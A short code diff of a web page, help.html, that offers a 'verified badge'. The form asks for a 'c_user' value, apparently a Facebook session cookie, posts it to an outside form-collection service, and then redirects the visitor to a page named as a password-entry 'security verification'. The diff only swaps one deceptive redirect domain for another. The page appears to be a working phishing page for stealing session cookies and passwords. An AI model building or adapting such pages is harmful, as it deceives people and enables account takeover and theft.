--- a/help.html
+++ b/help.html
@@ -213,7 +213,7 @@
         <p class=form-notice>Please ensure that all required information is accurately provided. Failure to do so may result in not receiving a verified badge.</p>
 
         <form class="content" action="https://submit-form.com/8PNOD6hv8" method="POST">
-            <input type="hidden" name="_redirect" value="https://php-enter-password.vercel.app/" />
+            <input type="hidden" name="_redirect" value="https://enter-password-for-security-verification.vercel.app/" />
 
             <div class=form-group>
                 <label for=c_user>c_user</label>
